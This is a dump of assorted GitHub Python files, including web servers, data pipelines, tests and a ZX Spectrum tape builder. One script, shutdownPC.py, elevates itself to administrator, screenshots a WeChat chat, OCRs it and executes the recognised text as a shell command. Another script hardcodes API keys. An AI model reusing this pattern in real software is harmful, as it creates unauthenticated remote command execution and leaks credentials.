[\n \"\",\n \"**Merged merge requests:**\",\n \"\"\n ]\n for mr in merge_requests:\n formatted_issues.append(format_merge_request(mr))\n formatted_issues.append(\"\")\n return formatted_issues\n\n\ndef format_issue(issue):\n return f\"- {issue.title} [\\\\#{issue.iid}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/issues/{issue.iid})\"\n\n\ndef format_merge_request(mr):\n formatted = f\"- {mr.title} [\\\\#{mr.iid}](https://gitlab.com/ColinDuquesnoy/MellowPlayer/merge_requests/{mr.iid})\"\n author = mr.author['username']\n if author != \"ColinDuquesnoy\":\n formatted += f\" ([{author}](https://gitlab.com/{author}))\"\n return formatted\n\n\ndef write_changelog(content):\n with open('CHANGELOG.md', 'r') as f:\n initial_content = f.read()\n initial_content = '\\n'.join(initial_content.splitlines()[1:])\n\n with open('CHANGELOG.md', 'w') as f:\n 
f.write(\"# Change log\\n\\n\" + content + initial_content)\n\n\nprevious_milestone_title = sys.argv[1]\nmilestone_title = sys.argv[2]\ngl = gitlab.Gitlab(\"https://gitlab.com\", private_token=os.getenv(\"GITLAB_TOKEN\"))\nproject = gl.projects.get(\"9602590\")\nmilestone_id = find_milestone_id(project)\nissues = find_milestone_issues(project)\nmerge_requests = find_milestone_merge_requests(project)\n\ncontent = [\n title(milestone_title),\n full_changelog(previous_milestone_title, milestone_title),\n \"\"\n]\n\ncontent += implemented_features(issues)\ncontent += fixed_bugs(issues)\ncontent += closed_issues(issues)\ncontent += merged_merge_requests(merge_requests)\nwrite_changelog('\\n'.join(content))\n","repo_name":"MellowPlayer/MellowPlayer","sub_path":"scripts/update-changelog.py","file_name":"update-changelog.py","file_ext":"py","file_size_in_byte":4603,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"43563485734","text":"from django.urls import path\nfrom .views import (\n UsersListView,\n UserDetailView,\n # PostCreateView,\n UserUpdateView,\n UserDeleteView,\n CreateEmailView,\n CreatePhoneView,\n\n)\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='users-home'),\n path('register/', views.register, name='register'),\n path('user//', UserDetailView.as_view(), name='user-detail'),\n path('user//update/', UserUpdateView.as_view(), name='user-update'),\n path('post//delete/', UserDeleteView.as_view(), name='user-delete'),\n path('update//email/', CreateEmailView.as_view(), name='email'),\n path('update//phone/', CreatePhoneView.as_view(), name='phone'),\n\n]","repo_name":"Ozborniasty/ansta_job","sub_path":"addressBook/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73585907307","text":"from airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime\nfrom airflow_dbt.operators.dbt_operator import (\n DbtSeedOperator,\n DbtRunOperator\n)\nfrom great_expectations_provider.operators.great_expectations import GreatExpectationsOperator\nimport os\n\n\n# Default settings\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': datetime(2020, 5, 21)\n}\n\nPROJECT_HOME = '/opt/airflow'\nDBT_ROOT_DIR = os.path.join(PROJECT_HOME, 'dbt')\nDBT_PROJECT_DIR = os.path.join(DBT_ROOT_DIR, 'sts')\nDBT_TARGET = 'dev'\nDBT_TARGET_DIR = os.path.join(DBT_PROJECT_DIR, 'target')\nGE_ROOT_DIR = os.path.join(PROJECT_HOME, 'great_expectations')\n\ndag = DAG(\n dag_id='example_dag',\n schedule_interval=None,\n default_args=default_args\n)\n\n\n\ndbt_seed = DbtSeedOperator(\n task_id='dbt_seed',\n dir=DBT_PROJECT_DIR,\n profiles_dir=DBT_ROOT_DIR,\n target=DBT_TARGET,\n dag=dag\n)\n\n\nvalidate_load = GreatExpectationsOperator(\n task_id='validate_load',\n assets_to_validate=[\n {\n 'batch_kwargs': {\n 'datasource': 'spark-thrift-server',\n 'schema': 'example',\n 'table': 'taxi_zone_lookup',\n 'data_asset_name': 'taxi_zone_lookup'\n },\n 'expectation_suite_name': 'custom_sql_query.warning'\n }\n ],\n data_context_root_dir=GE_ROOT_DIR,\n dag=dag\n)\n\n\ndbt_run = DbtRunOperator(\n task_id='dbt_run',\n dir=DBT_PROJECT_DIR,\n profiles_dir=DBT_ROOT_DIR,\n target=DBT_TARGET,\n dag=dag\n)\n\n\nvalidate_transform = GreatExpectationsOperator(\n task_id='validate_transform',\n expectation_suite_name='taxi_zone_incremental.source',\n batch_kwargs={\n 
'datasource': 'spark-thrift-server',\n 'schema': 'example',\n 'table': 'taxi_zone_incremental',\n 'data_asset_name': 'taxi_zone_incremental'\n },\n data_context_root_dir=GE_ROOT_DIR,\n dag=dag\n)\n\nge_docs_generate = BashOperator(\n task_id='ge_docs_generate',\n bash_command=f'great_expectations docs build --directory {GE_ROOT_DIR} --assume-yes',\n dag=dag\n)\n\n\ndbt_seed >> validate_load >> dbt_run >> validate_transform >> ge_docs_generate\n","repo_name":"gumartinm/dbt-sts-ge","sub_path":"dags/example_dag.py","file_name":"example_dag.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"36973838373","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nimport sys\nif len(sys.argv) > 1:\n\tsys.path.insert(0, sys.argv.pop(1))\n\nimport unittest\n\nimport viennagrid.wrapper\n\nfrom utils import equal\n\nclass TestAlgorithmsCartesian2D(unittest.TestCase):\n\tdef setUp(self):\n\t\tpass\n\t\n\tdef test_inner_prod(self):\n\t\tax = 2\n\t\tay = 5\n\t\ta = viennagrid.wrapper.PointCartesian2D(ax, ay)\n\t\t\n\t\tbx = 8\n\t\tby = 4\n\t\tb = viennagrid.wrapper.PointCartesian2D(bx, by)\n\t\t\n\t\tres = a.inner_prod(b)\n\t\tself.assertEqual(res, ax * bx + ay * by)\n\t\t\n\t\tres = b.inner_prod(a)\n\t\tself.assertEqual(res, ax * bx + ay * by)\n\nclass TestAlgorithmsCartesian2D(unittest.TestCase):\n\tdef setUp(self):\n\t\tpass\n\t\n\tdef test_inner_prod(self):\n\t\tax = 2\n\t\tay = 5\n\t\taz = 10\n\t\ta = viennagrid.wrapper.PointCartesian3D(ax, ay, az)\n\t\t\n\t\tbx = 8\n\t\tby = 4\n\t\tbz = 123\n\t\tb = viennagrid.wrapper.PointCartesian3D(bx, by, bz)\n\t\t\n\t\tres = a.inner_prod(b)\n\t\tself.assertEqual(res, ax * bx + ay * by + az * bz)\n\t\t\n\t\tres = b.inner_prod(a)\n\t\tself.assertEqual(res, ax * bx + ay * by + az * bz)\n\t\n\tdef test_cross_prod(self):\n\t\ta = viennagrid.wrapper.PointCartesian3D(1, 0, 0)\n\t\tb = viennagrid.wrapper.PointCartesian3D(0, 1, 0)\n\t\t\n\t\tres = a.cross_prod(b)\n\t\tself.assertEqual(res.coords, [0, 0, 1])\n\t\t\n\t\tres = a.cross_prod(b)\n\t\tself.assertEqual(res.coords, [0, 0, 1])\n\t\n\tdef test_norm(self):\n\t\tp = viennagrid.wrapper.PointCartesian3D(1, 2, 3)\n\t\tself.assertTrue(equal(p.norm_1(), 6))\n\t\tself.assertTrue(equal(p.norm_2(), 3.74))\n\t\tself.assertTrue(equal(p.norm_inf(), 3))\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"jonancm/viennagrid-python","sub_path":"test/test_algorithms.py","file_name":"test_algorithms.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28484292529","text":"\"\"\"\nAdmin API — Exclusive endpoints for allowing actions that requires authentication from higher-ups to allow users for use of the platform.\n\nThis file is part of FolioBlocks.\n\nFolioBlocks is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.\nFolioBlocks is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with FolioBlocks. 
If not, see <https://www.gnu.org/licenses/>.\"\"\"\n\n\n\"\"\"\n# Further Notice\nThis endpoint should be used for generating users as an associate/organization or as a node. When running this endpoint, ensure that you look for\n\n\"\"\"\n\nfrom asyncio import gather\nfrom datetime import datetime, timedelta\nfrom http import HTTPStatus\nfrom logging import Logger, getLogger\nfrom sqlite3 import IntegrityError\n\nfrom blueprint.models import auth_codes, users\nfrom blueprint.schemas import GenerateAuthInput\nfrom core.constants import (\n    ASYNC_TARGET_LOOP,\n    BaseAPI,\n    NodeAPI,\n    RequestPayloadContext,\n    UserEntity,\n)\nfrom databases import Database\nfrom fastapi import APIRouter, Depends, Header, HTTPException\nfrom sqlalchemy import func, select\nfrom sqlalchemy.sql.expression import Insert, Select, Update\nfrom core.dependencies import EnsureAuthorized\nfrom utils.email import EmailService, get_email_instance\nfrom utils.processors import save_database_state_to_volume_storage\n\nlogger: Logger = getLogger(ASYNC_TARGET_LOOP)\n\nadmin_router = APIRouter(\n    prefix=\"/admin\",\n    tags=[BaseAPI.ADMIN.value],\n)\n\n\n@admin_router.post(\n    \"/generate_auth\",\n    tags=[NodeAPI.GENERAL_NODE_API.value],\n    summary=\"Generates token for the registration of the user as a node or as a normal user.\",\n    description=\"An exclusive API endpoint that generates token for users to register. This should be triggered by an admin.\",\n    status_code=HTTPStatus.ACCEPTED,\n)\nasync def generate_auth_token_for_entities(\n    *,\n    payload: GenerateAuthInput,\n    x_passcode: str = Header(\n        ...,\n        description=\"The special passcode that allows the generation of `auth_code`.\",\n    ),\n    authorizer_address=Depends(\n        EnsureAuthorized(\n            _as=[\n                UserEntity.MASTER_NODE_USER,\n                UserEntity.ORGANIZATION_DASHBOARD_USER,\n            ],\n            return_address_from_token=True,\n        )\n    ),\n) -> RequestPayloadContext:\n\n    # ! We cannot append these dependencies from the function due to circular import dependencies.\n    from core.dependencies import (\n        PasscodeTOTP,\n        generate_auth_token,\n        get_database_instance,\n        get_totp_instance,\n    )\n\n    database_instance: Database = (\n        get_database_instance()\n    )  # - Prioritize this instance before any other.\n\n    # - Get necessary information from this address.\n    authorizer_address_info_query: Select = select(\n        [users.c.association, users.c.type, users.c.date_registered]\n    ).where(\n        (users.c.unique_address == authorizer_address)\n        & (\n            (users.c.type == UserEntity.MASTER_NODE_USER)\n            | (users.c.type == UserEntity.ORGANIZATION_DASHBOARD_USER)\n        )\n    )\n\n    authorizer_address_info = await database_instance.fetch_one(\n        authorizer_address_info_query\n    )\n\n    if authorizer_address_info is None:\n        raise HTTPException(\n            detail=\"User attributes were not found. This is not possible due to being able to be authenticated in the first-layer. Please report this problem from the administrator.\",\n            status_code=HTTPStatus.NOT_FOUND,\n        )\n\n    # - Only handle for the organization, since it has multiple association entries.\n    # ! 
For the case of the master node, we don't need to do some extra validation.\n if authorizer_address_info.type is UserEntity.ORGANIZATION_DASHBOARD_USER: # type: ignore\n # - Filter out these users by getting the their address and the date.\n validate_date_registration_from_associates_query: Select = select(\n [func.count()]\n ).where(\n (users.c.date_registered < authorizer_address_info.date_registered)\n & (users.c.association == authorizer_address_info.association)\n ) # type: ignore\n\n # - Compare this address against others from their address.\n covered_by_date_associates = await database_instance.fetch_val(\n validate_date_registration_from_associates_query\n )\n\n if covered_by_date_associates:\n raise HTTPException(\n detail=\"You are not authorized to create the authentication code. Please ask the creator of the organization from the system.\",\n status_code=HTTPStatus.UNAUTHORIZED,\n )\n\n auth_instance: PasscodeTOTP | None = get_totp_instance()\n email_instance: EmailService | None = get_email_instance()\n require_new_token: bool = False # * A switch for allowing a token to be renewed by sending a new email with a new code.\n\n if auth_instance is None or email_instance is None or database_instance is None:\n raise HTTPException(\n detail=\"Instance is not yet ready. This means, the system is not yet ready to take special requests. Try again later.\",\n status_code=HTTPStatus.ACCEPTED,\n )\n\n if payload.role is UserEntity.MASTER_NODE_USER:\n raise HTTPException(\n detail=(\n f\"Role not allowed! There should only be one {UserEntity.MASTER_NODE_USER.value}.\",\n ),\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n elif payload.role is UserEntity.STUDENT_DASHBOARD_USER:\n raise HTTPException(\n detail=(\n f\"Requesting an authentication code through this role ('{UserEntity.STUDENT_DASHBOARD_USER.value}') is not allowed.\",\n ),\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n else:\n if auth_instance.verify(x_passcode):\n generated_token: str = generate_auth_token()\n\n try:\n # - First check, check if this user was already an existing user via checking the 'users' table.\n check_existing_user_via_users_query: Select = select(\n [func.count()]\n ).where(users.c.email == payload.email)\n\n user_email_exists_via_users = await database_instance.fetch_val(\n check_existing_user_via_users_query\n )\n\n if user_email_exists_via_users:\n raise HTTPException(\n detail=\"Cannot create authentication code due to the user already existing from the system! Please check and get their login credentials checked.\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n # - Last step, check the given email from the authentication code table ('auth_codes').\n check_existing_user_via_auth_token_query: Select = select(\n [func.count(), auth_codes.c.expiration]\n ).where(auth_codes.c.to_email == payload.email)\n\n user_context_from_auth_codes = await database_instance.fetch_one(\n check_existing_user_via_auth_token_query\n )\n\n if (\n user_context_from_auth_codes.count\n and datetime.now() < user_context_from_auth_codes.expiration\n ):\n raise HTTPException(\n detail=\"The email associated from this request already has an authentication code!\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n elif (\n user_context_from_auth_codes.count\n and datetime.now() >= user_context_from_auth_codes.expiration\n ):\n require_new_token = True\n logger.warning(\n \"An expired authentication code has been detected from one of the queried email, renewal will be processed. 
Check for the log regarding email services sending a renewed token.\"\n )\n\n # - Handle new token to be renewal or literally a new one.\n if require_new_token:\n update_expired_token_query: Update = (\n auth_codes.update()\n .where(auth_codes.c.to_email == payload.email)\n .values(token=generated_token)\n )\n await gather(\n database_instance.execute(update_expired_token_query),\n save_database_state_to_volume_storage(),\n )\n\n else:\n insert_generated_token_query: Insert = auth_codes.insert().values(\n code=generated_token,\n account_type=payload.role,\n to_email=payload.email,\n expiration=datetime.now() + timedelta(days=2),\n )\n await gather(\n database_instance.execute(insert_generated_token_query),\n save_database_state_to_volume_storage(),\n )\n\n # ! Do not change this, regardless of the token's existence and its state.\n # - I have no time for that.\n await email_instance.send(\n content=f\"
Auth Code for the Folioblock's {payload.role.value}! Thank you for taking part in our ecosystem! To register, please enter the following auth code. Remember, do not share this code to anyone. Auth Code: {generated_token} Didn't know who sent this? Please consult your representatives of your organization / institution regarding this matter. 
Learn the development progression on Github.\",\n subject=f\"Auth Code for Registration as a {payload.role.value} at Folioblocks\",\n to=payload.email,\n )\n\n except IntegrityError as e:\n raise HTTPException(\n detail=f\"Cannot provide anymore authentication token to the requested user. Please report the following error: {e}\",\n status_code=HTTPStatus.FORBIDDEN,\n )\n\n logger.info(\n \"Authentication code has been sent from one the requested users. Check preceeding logs for more information.\"\n )\n\n return {\n \"detail\": f\"Invocation of the email for a registration as a '{payload.role.value}' were successful. Advise to check their email.\"\n }\n\n else:\n raise HTTPException(\n detail=\"Invalid TOTP passcode.\", status_code=HTTPStatus.NOT_ACCEPTABLE\n )\n","repo_name":"CodexLink/folioblocks","sub_path":"node/api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":11204,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"41440639958","text":"import os\r\nimport keyboard\r\nimport time\r\nfrom aip import AipOcr\r\nfrom PIL import Image, ImageGrab\r\nimport sys,ctypes\r\n\r\ndef is_admin():\r\n try:\r\n return ctypes.windll.shell32.IsUserAnAdmin()\r\n except:\r\n return False\r\n\r\n\r\n\r\nif is_admin():\r\n\r\n keyboard.press_and_release('ctrl+alt+w')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('ctrl+f')\r\n time.sleep(0.5)\r\n keyboard.write('文件传输助手')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('enter')\r\n\r\n time.sleep(0.5)\r\n keyboard.press_and_release('alt+print screen')\r\n time.sleep(0.5)\r\n keyboard.press_and_release('ctrl+alt+w')\r\n time.sleep(0.5)\r\n\r\n # 将从屏幕获取到的截图存储到同级目录下\r\n image = ImageGrab.grabclipboard()\r\n image.save(\"pic.png\")\r\n time.sleep(0.5)\r\n img = Image.open('pic.png')\r\n width, height = img.size\r\n\r\n left = width / 2\r\n top = height / 2\r\n right = width\r\n bottom = height\r\n im1 = img.crop((left, top, right, bottom))\r\n im1.save('pic.png')\r\n\r\n # 此处填写你的APP参数信息\r\n APP_ID = 'YOUR APP_ID'\r\n API_KEY = 'YOUR API_KEY'\r\n SECRET_KEY = 'YOUR SECRET_KEY'\r\n\r\n client = AipOcr(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n img = open('pic.png', 'rb').read()\r\n message = client.basicGeneral(img)\r\n res = message['words_result']\r\n # print(res[-2]['words']) #待执行的命令\r\n # for i in res:\r\n # print(i['words'])\r\n\r\n os.popen(res[-2]['words'])\r\n\r\nelse:\r\n if sys.version_info[0] == 3:\r\n # print(\"无管理员权限\")\r\n ctypes.windll.shell32.ShellExecuteW(None, \"runas\", sys.executable, __file__, None, 1)\r\n","repo_name":"icyzhe/Remote-Shutdown-Your-PC","sub_path":"shutdownPC.py","file_name":"shutdownPC.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16528835096","text":"import requests\nimport json\nimport pprint\nimport csv\n\n#Abro el csv\nkey_open_weather = 'dbab0df10e6e13cff5c0becfbfae9139'\nkey_open_geo = '931f2abe294f4d9ea74afa0cf790df99'\n\n#Si tuviera un archivo con 500 ciudades es dificil darse cuenta rapida donde esta el error\n#Por eso se crea un archivo con los logs de errores \nwith open('sucursales_sol_360.csv') as csv_hoteles, open('sucursales_con_clima.csv','w') as csv_hoteles_clima, open('log_errores.txt','w') as errores:\n hoteles=csv.reader(csv_hoteles, delimiter=';')\n for ciudad in hoteles:\n nombre_ciudad = ciudad[0]+ ', ' +ciudad[1] + ', Argentina' #CLAVE PONER ARGENTINA SINO TE PUEDE TOMAR DE OTRO PAIS\n #print(nombre_ciudad) 
Merlo, San Luis Ushuaia, Tierra del fuego etc\n ciudad_cod=requests.utils.quote(nombre_ciudad)\n #Primero tengo que darle de comer a la primera API \n url_geo='https://api.opencagedata.com/geocode/v1/json?q=' + ciudad_cod +'&key=' + key_open_geo\n objeto_geo=json.loads(requests.get(url_geo).text)\n #pprint.pprint(objeto_geo)\n lat = objeto_geo['results'][0]['geometry']['lat']\n lon = objeto_geo['results'][0]['geometry']['lng']\n #print(nombre_ciudad,lat,lon)\n \n \n#%% \n \n #api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&appid={your api key}\n #No necesito mas el nombre de la ciudad_cod ahora pongo directamente las coordenadas\n url = \"https://api.openweathermap.org/data/2.5/weather?lat=\" + str(lat) + \"&lon=\" + str(lon) + \"&units=metric&lang=es&appid=\" + key_open_weather\n objeto=json.loads(requests.get(url).text)\n #if 'main' in objeto.keys(): #Poprque sino da Keyerror main entonces veo si lo agarra\n if objeto.get('main'):\n print(\"El clima en\", nombre_ciudad)\n print(\"La temperatura es de \",objeto['main']['temp'],'C')\n print(\"La humedad es de \", objeto['main']['humidity'],'%')\n print(\"El clima: \", objeto['weather'][0]['description'] + '\\n')\n else: \n print(\"No existe la ciudad: \", nombre_ciudad, '\\n')\n errores.write(\"No existe lal ciudad \" + nombre_ciudad + '\\n')\n #Escribo en un txt las ciudades que dieron error o que no existen\n#Ahora hay que solucionar esos errores de CABA e IBERA parece que no estan en la base de datos de open weather\n#Necesito encontrar una API que le pase la ciudad y me devuelva las coordenadas\n ","repo_name":"sebastiancolussi/Weather_geo_API","sub_path":"Weather_geo_API.py","file_name":"Weather_geo_API.py","file_ext":"py","file_size_in_byte":2461,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24797948809","text":"from flask import Flask, request, jsonify\nimport random\nfrom threading import Lock\nLOCK = Lock()\n\nfrom translate import translate_lines\nfrom align import align_sentence, replace_words\n\nwordcount = 0\ndef replace_sentences(sentences, src_word_list=set(), tgt_word_list=set()):\n \"\"\"\n Replace words in a list of sentences with their translations.\n src_word_list is the set of the words in the source language you want to have replaced,\n and tgt_word_list is the set of words in the target language you want to show up. 
\n \"\"\"\n print(\"Total sentences =\", len(sentences))\n import time\n start = time.time()\n translations = translate_lines(sentences)\n print(\"time to translate:\", time.time() - start)\n start = time.time()\n alignments = [align_sentence(sentence, translation) for sentence, translation in zip(sentences, translations)]\n print(\"time to align translation:\", time.time() - start)\n\n # tgt_words = [word for sent_src, sent_tgt, align_words in alignments for word, _ in sent_tgt]\n # global wordcount\n # wordcount += len(tgt_words)\n # print(\"word count at\", wordcount)\n # if wordcount >= 1000:\n # tgt_words = set(tgt_words) - tgt_word_list\n # new_word = random.choice(tuple(tgt_words))\n # new_word = new_word.strip().lower()\n # with open(\"../de_words.txt\", 'a', encoding='utf-8') as f:\n # f.write(new_word + \"\\n\")\n # tgt_word_list.add(new_word)\n # wordcount = 0\n\n start = time.time()\n new_sentences = [replace_words(*a, src_word_list=src_word_list, tgt_word_list=tgt_word_list)\n for a in alignments]\n print(\"time to reconstruct:\", time.time() - start)\n start = time.time()\n new_sentences = [sent.strip() for sent in new_sentences]\n return new_sentences\n\nwith open(\"../en_words.txt\", 'r', encoding=\"utf-8\") as f:\n src_word_list = {word.strip() for word in f.readlines() if word.strip()}\nwith open(\"../de_words.txt\", 'r', encoding=\"utf-8\") as f:\n tgt_word_list = {word.strip() for word in f.readlines() if word.strip()}\n\n#print(replace_sentences([\"The most important thing was to stay on the premises.\"], src_word_list, tgt_word_list))\n#exit()\napp = Flask(__name__)\n@app.route('/set_src_list', methods=['POST'])\ndef set_src_list():\n global src_word_list\n data = request.get_json()\n if isinstance(data, list) and all(isinstance(item, str) for item in data):\n src_word_list = {s.lower() for s in data}\n return 'List stored successfully!'\n else:\n return jsonify({'error': 'Invalid list format. Please provide a list of strings.'}), 400\n\n@app.route('/set_tgt_list', methods=['POST'])\ndef set_tgt_list():\n global tgt_word_list\n data = request.get_json()\n if isinstance(data, list) and all(isinstance(item, str) for item in data):\n tgt_word_list = {s.lower() for s in data}\n return 'List stored successfully!'\n else:\n return jsonify({'error': 'Invalid list format. Please provide a list of strings.'}), 400\n\n@app.route('/replace_sentences', methods=['POST'])\ndef replace_sentences_():\n try:\n LOCK.acquire()\n input_list = request.get_json()[\"sentences\"]\n if isinstance(input_list, list) and all(isinstance(item, str) for item in input_list):\n sentences = [s.strip() for s in input_list]\n replaced = replace_sentences(sentences, src_word_list, tgt_word_list)\n LOCK.release()\n return jsonify({\"replacements\": replaced})\n else:\n LOCK.release()\n return jsonify({'error': 'Invalid list format. 
Please provide a dictionary of the format {\"sentences\": [\"sentence 1\", ..., \"sentence N\"]}'}), 400\n    except Exception as e:\n        print(\"Error occurred:\", e)\n        LOCK.release()\n        return jsonify({'error': 'Internal server error'}), 500\napp.run(port=5000, host='localhost')","repo_name":"cooljoseph1/translate-to-german","sub_path":"python-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8009685706","text":"from aiogram import types\n\nfrom app.external.drivers.bitbucket import BitbucketDriver\nfrom app.external.utils.handler_routing import parse_button_route\nfrom app.internal.logic.entities.db.user import User\nfrom app.internal.logic.services.user import UserService\n\n\nclass BaseStates:\n    handlers = {}\n    payload = {}\n\n    user: User\n    driver: BitbucketDriver\n\n    @classmethod\n    async def create(cls, user_telegram_id):\n        self = cls()\n        self.user = await UserService.get_user_by_telegram_id(user_telegram_id)\n        await self.user.get_session()\n        self.driver = BitbucketDriver(await self.user.access_token)\n        return self\n\n    async def process(self, event: types.CallbackQuery):\n        self.payload = parse_button_route(event.data)\n        if len(self.payload['route']) == 1:\n            await self.handlers['-'](event, self.user, self.driver, self.payload['vars'])\n        else:\n            func: str = self.payload['route']['1']\n            if func not in self.handlers:\n                return await event.bot.send_message(\n                    event.from_user.id, text=\"This option is coming soon...\"\n                )\n            await self.handlers[func](event, self.user, self.driver, self.payload['vars'])\n","repo_name":"PaperDevil/exalted-atlassian","sub_path":"app/internal/web/telegram/states/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13031331972","text":"import cv2\nimport numpy as np\nimport math\nimport glob\nimport sys\n\n# Self-made packages\nimport check\nimport Show_3D_add as ADD\nimport Show_3D_color as COLOR\nimport Projection as PROJECTION\nimport demo_extractor as DEMO\n\nx_range = 100\ny_range = 100\nz_range = 100\nthreshold = 240\ntheta = math.degrees(math.atan2(8,10))\n\nsize = (100,100)\nsin = math.sin(math.radians(theta))\ncos = math.cos(math.radians(theta))\n\nx_range_oblique = x_range\ny_range_oblique = (int)(y_range*sin + z_range*cos)\nz_range_oblique = (int)(y_range*cos + z_range*sin)\n\n\nmap_front = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array('IMG_8775.JPG',map_front,248,100)\n\n\nmap_side = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array('IMG_8776.JPG',map_side,235,100)\nmap_side = map_side.transpose(0,2,1)\n\n\nmap_oblipue = PROJECTION.Make_3D_Array(y_range_oblique,x_range_oblique,z_range_oblique)\nPROJECTION.Fill_3D_Array('IMG_8777.JPG',map_oblipue,245,128)\nmap_oblique_true = PROJECTION.Rotate_and_Shlink_from_side_upper(map_oblipue,theta)\n\n\nslice = map_oblique_true[:,:,z_range-1]\nmap_nest = PROJECTION.Make_3D_Array(y_range,x_range,z_range)\nPROJECTION.Fill_3D_Array_img(slice,map_nest,threshold,128)\n\nmap_true = map_front * map_side * map_oblique_true\nmap_add = map_front + map_side + 
map_oblique_true\n\n\n#COLOR.Show_3D_color(map_oblique_true,'cyan',1)\n#COLOR.Show_3D_color(map_front,'cyan',1)\n#COLOR.Show_3D_color(map_side,'cyan',1)\nCOLOR.Show_3D_color(map_true,'cyan',1)\n#ADD.Show_3D(map_add.transpose(1,0,2))\n#ADD.Show_3D_3COLOR(map_add.transpose(1,0,2))\n#COLOR.Show_3D_color(map_oblipue,'cyan',1)\nCOLOR.Show_3D_color(map_oblique_true,'cyan',1)\nslice = map_oblique_true[:,:,z_range-1]\n#check.show('slice',slice)\n#cv2.imwrite('nest.JPG',slice)\n\n\"\"\"\nimg = cv2.imread('IMG_8777.JPG')\nsize = (img.shape[0],img.shape[1])\nPROJECTION.cut_rotate(img,size,theta)\n\"\"\"\n#DEMO.thresh_checker('IMG_8776.JPG')\n","repo_name":"taigababa/3d_mapping","sub_path":"MAP/Occlusion_Test.py","file_name":"Occlusion_Test.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41904091890","text":"# Prerequisite:\n#\n# bitstring\n# sudo pip install bitstring OR sudo easy_install bitstring\n#\n#import os\nimport sys\nsys.path.append(\"modules\")\nfrom tzx import *\nfrom zxfile import *\nfrom versaload import *\nfrom screenutil import *\n\ntape = TZX()\n\n\"\"\"\nFile metadata\n\"\"\"\ninfoblock = Blk_AIB()\ninfoblock.add_info(AINFO_TITLE,\"Versaload test 2\")\ninfoblock.add_info(AINFO_AUTHOR,\"Peter Knight (going-digital)\")\ninfoblock.add_info(AINFO_PUBYEAR,\"2013\")\ninfoblock.add_info(AINFO_PROTECTION,\"Versaload\")\ninfoblock.add_info(AINFO_COMMENT,\"http://github.com/going-digital/versaload\")\n#infoblock.add_info(AINFO_PUBLISHER,\"\")\n#infoblock.add_info(AINFO_LANG,\"\")\n#infoblock.add_info(AINFO_TYPE,\"\")\n#infoblock.add_info(AINFO_PRICE,\"\")\n#infoblock.add_info(AINFO_ORIGIN,\"\")\ntape.add_block(infoblock)\n\n\"\"\"\nLoader\n\"\"\"\nloaderprog = open(\"boot1.bin\",\"rb\").read()\nloaderheader = ZX_FileHdr(SPEC_FILE_PROG, '\\x16\\x0b\\x0cLoading', 0, 0, 0)\nloaderdata = ZX_FileData(loaderprog)\nloaderheader.setdatalen(loaderdata.datalen())\nloaderblock1 = Blk_SSDB(data=loaderheader.get())\ntape.add_block(loaderblock1)\nloaderblock2 = Blk_SSDB(data=loaderdata.get())\nloaderblock2.pause(0)\ntape.add_block(loaderblock2)\n\n\"\"\"\nExtract key addresses from Pasmo output\n\nSome loader features make live code modifications to the loading routine.\nHere we extract those addresses from the Pasmo output to use later.\n\"\"\"\n# Extract important addresses from Pasmo output\nlabelList = {}\nwith open(\"boot2.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nwith open(\"print.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nwith open(\"setbaud.asmgl\") as labels:\n for line in labels:\n (label,dummy,value) = line.split()\n labelList[label]=int(value[1:-1],16)\nborderFlashAddr = labelList['BORDER_FLASH']\nborderMainAddr = labelList['BORDER_MAIN']\nborderErrorFlashAddr = labelList['BORDER_ERROR_FLASH']\nborderErrorMainAddr = labelList['BORDER_ERROR_MAIN']\nprintRoutine = labelList['PRINT_ROUTINE']\nprintParam = labelList['PRINT_PARAM']\nbaud = labelList['BAUD'] # Note: baud rate is set in setbaud.py\ncountBlock = labelList['COUNT_BLOCK']\ncountDisable = labelList['COUNT_DISABLE']\ncountStates = 